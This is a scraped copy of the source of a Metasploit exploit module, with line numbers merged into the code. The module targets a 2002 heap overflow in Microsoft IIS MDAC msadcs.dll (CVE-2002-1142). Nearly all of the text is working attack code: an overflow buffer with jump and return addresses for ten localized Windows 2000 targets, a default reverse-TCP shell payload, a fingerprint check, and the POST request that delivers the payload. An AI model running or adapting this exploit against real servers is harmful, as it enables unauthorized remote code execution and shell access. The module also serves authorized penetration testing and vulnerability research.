Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/iis/ms02_065_msadc.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',15'Description' => %q{16This module can be used to execute arbitrary code on IIS servers17that expose the /msadc/msadcs.dll Microsoft Data Access Components18(MDAC) Remote Data Service (RDS) DataFactory service. The service is19exploitable even when RDS is configured to deny remote connections20(handsafe.reg). The service is vulnerable to a heap overflow where21the RDS DataStub 'Content-Type' string is overly long. Microsoft Data22Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.23},24'Author' => 'aushack',25'Platform' => 'win',26'Arch' => [ARCH_X86],27'References' => [28['OSVDB', '14502'],29['BID', '6214'],30['CVE', '2002-1142'],31['MSB', 'MS02-065'],32['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']33],34'Privileged' => false,35'Payload' => {36'Space' => 1024,37'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x27:?<>=$\\/;=+%#&", # "\u0000\t\n\v\r \"':?<>=$\\/;=+%#&"38'StackAdjustment' => -350039},40'DefaultOptions' => {41'PAYLOAD' => 'windows/shell/reverse_tcp',42'EXITFUNC' => 'seh' # stops IIS from crashing... hopefully43},44'Targets' => [45# jmp eax ws2help.dll46[ 'Windows 2000 Pro SP0-SP3 (English)', { 'Ret' => 0x75023783 } ],47[ 'Windows 2000 Pro SP0 (Korean)', { 'Ret' => 0x74f93783 } ],48[ 'Windows 2000 Pro SP0 (Dutch)', { 'Ret' => 0x74fd3783 } ],49[ 'Windows 2000 Pro SP0 (Finnish)', { 'Ret' => 0x74ff3783 } ],50[ 'Windows 2000 Pro SP0 (Turkish)', { 'Ret' => 0x74fc3783 } ],51[ 'Windows 2000 Pro SP0-SP1 (Greek)', { 'Ret' => 0x74f73783 } ],52[ 'Windows 2000 Pro SP1 (Arabic)', { 'Ret' => 0x74f93783 } ],53[ 'Windows 2000 Pro SP1 (Czech)', { 'Ret' => 0x74fc3783 } ],54[ 'Windows 2000 Pro SP2 (French)', { 'Ret' => 0x74fa3783 } ],55[ 'Windows 2000 Pro SP2 (Portuguese)', { 'Ret' => 0x74fd3783 } ],56],57'DefaultTarget' => 0,58'DisclosureDate' => '2002-11-02',59'Notes' => {60'Reliability' => [REPEATABLE_SESSION],61'Stability' => [CRASH_SERVICE_DOWN],62'SideEffects' => [IOC_IN_LOGS]63}64)65)6667register_options([68OptString.new('TARGETURI', [ true, 'The path to msadcs.dll', '/msadc/msadcs.dll' ], aliases: [ 'PATH' ]),69])70end7172def check73res = send_request_cgi('uri' => normalize_uri(target_uri.path))7475return CheckCode::Unknown('Connection failed') unless res76return CheckCode::Unknown('HTTP server error') if res.code == 50077return CheckCode::Safe('Access Forbidden') if res.code == 4037879if res.code == 200 && res.body.to_s.include?('Content-Type: application/x-varg')80return CheckCode::Detected("#{target_uri.path} content type matches fingerprint application/x-varg")81end8283CheckCode::Safe84end8586def exploit87sploit = rand_text_alphanumeric(136)88sploit[24, 2] = Rex::Arch::X86.jmp_short(117)89sploit << [target['Ret']].pack('V')90sploit << payload.encoded9192send_request_cgi({93'uri' => normalize_uri(target_uri.path, '/AdvancedDataFactory.Query'),94'method' => 'POST',95'data' => "Content-Type: #{sploit}"96})97end98end99100101